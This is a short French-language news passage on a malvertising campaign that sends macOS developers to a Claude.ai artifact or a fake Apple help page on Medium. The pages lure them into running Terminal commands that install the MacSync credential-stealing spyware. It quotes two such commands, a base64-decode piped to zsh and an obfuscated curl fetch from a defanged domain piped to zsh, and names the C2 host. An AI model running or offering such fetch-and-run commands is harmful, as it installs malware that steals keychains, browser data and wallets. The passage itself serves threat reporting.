Les annonces malveillantes ciblent les requêtes que tapent régulièrement les développeurs macOS : « résolveur DNS en ligne », « analyseur d'espace disque en ligne de commande macOS » ou encore « HomeBrew ». Les publicités renvoient vers un artefact Claude.ai ou vers un article Medium grimé en page d'aide officielle d'Apple. Dans les deux cas, le but est de leur faire exécuter une commande dans le Terminal.

La première variante propose echo "..." | base64 -D | zsh, la seconde passe par true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh. Ces lignes décodent ou téléchargent un chargeur qui installe MacSync. Le spyware communique ensuite avec son serveur de commande et de contrôle (C2) via un jeton et une clé API codés en dur. Il usurpe un agent utilisateur de navigateur macOS pour se fondre dans le trafic normal.

Moonlock Lab a constaté que les deux variantes récupèrent leur payload depuis la même adresse C2, a2abotnet[.]com/gate. Un seul acteur malveillant pilote donc les deux campagnes. MacSync ordonne à AppleScript de piller le trousseau d'accès, les données des navigateurs et les portefeuilles de cryptomonnaies. Les informations volées atterrissent dans une archive compressée baptisée « /tmp/osalogging.zip », puis partent vers le serveur C2 via une requête HTTP POST. Si le transfert échoue, le malware fragmente l'archive et retente l'opération huit fois avant d'effacer toute trace.